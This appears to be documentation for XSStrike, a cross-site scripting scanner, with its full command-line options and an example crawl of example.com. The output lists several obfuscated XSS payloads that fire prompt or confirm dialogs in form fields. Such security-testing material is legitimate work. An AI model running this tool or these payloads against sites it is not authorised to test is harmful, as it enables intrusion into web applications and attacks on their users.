XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.
git clone https://github.com/s0md3v/XSStrike.git
xsstrike.py [-h] [-u target] [--data paramdata] [-e encode] [--fuzzer] [--update] [--timeout timeout] [--proxy] [--params] [--crawl] [--json] [--path] [--seeds args_seeds] [-f args_file] [-l level] [--headers [add_headers]] [-t threadcount] [-d delay] [--skip] [--skip-dom]
[--blind] [--console-log-level {debug,info,run,good,warning,error,critical,vuln}] [--file-log-level {debug,info,run,good,warning,error,critical,vuln}] [--log-file log_file]
optional arguments:
-h, --help show this help message and exit
-u target, --url target
--data paramdata post data
-e encode, --encode encode
encode payloads
--fuzzer fuzzer
--update update
--timeout timeout timeout
--proxy use prox(y|ies)
--params find params
--crawl crawl
--json treat post data as json
--path inject payloads in the path
--seeds args_seeds load crawling seeds from a file
-f args_file, --file args_file
load payloads from a file
-l level, --level level
level of crawling
--headers [add_headers]
add headers
-t threadcount, --threads threadcount
number of threads
-d delay, --delay delay
delay between requests
--skip don't ask to continue
--skip-dom skip dom checking
--blind inject blind xss payload while crawling
--console-log-level {debug,info,run,good,warning,error,critical,vuln}
console logging level
--file-log-level {debug,info,run,good,warning,error,critical,vuln}
file logging level
--log-file log_file name of the file to log
$ ./xsstrike.py -u 'https://www.example.com/zoeken/\?value\=test' --crawl
XSStrike v3.1.4
[~] Crawling the target
[++] Vulnerable webpage: https://www.example.com/umbraco/Surface/Form/Post
[++] Vector for Salutation: <hTmL%0dONPOINTeReNTer%0d=%0da=prompt,a()%0dx//
[++] Vulnerable webpage: https://www.example.com/umbraco/Surface/Form/Post
[++] Vector for Initials: <A%09OnMOUSEoVEr%0a=%0a(prompt)``%0dx//v3dm0s
[++] Vulnerable webpage: https://www.example.com/umbraco/Surface/Form/Post
[++] Vector for Insertion: <D3v%0dOnMoUsEoVEr%0a=%0a(prompt)``//v3dm0s
[++] Vulnerable webpage: https://www.example.com/umbraco/Surface/Form/Post
[++] Vector for LastName: <htML%0doNPOINTEreNTeR+=+confirm()%0dx//
[++] Vulnerable webpage: https://www.example.com/umbraco/Surface/Form/Post
[++] Vector for EmailAddress: <d3v%0doNMouSEoVer+=+(prompt)``//v3dm0s
[++] Vulnerable webpage: https://www.example.com/umbraco/Surface/Form/Post
[++] Vector for PhoneNumber: <A/+/oNMOuSeOVeR%09=%09confirm()//v3dm0s
[++] Vulnerable webpage: https://www.example.com/umbraco/Surface/Form/Post
[++] Vector for CustomerNumber: <htMl%0dOnMouSEoVer%0a=%0a[8].find(confirm)//
[++] Vulnerable webpage: https://www.example.com/umbraco/Surface/Form/Post
[++] Vector for Subject: <D3v%09onmOUsEoVEr+=+confirm()//v3dm0s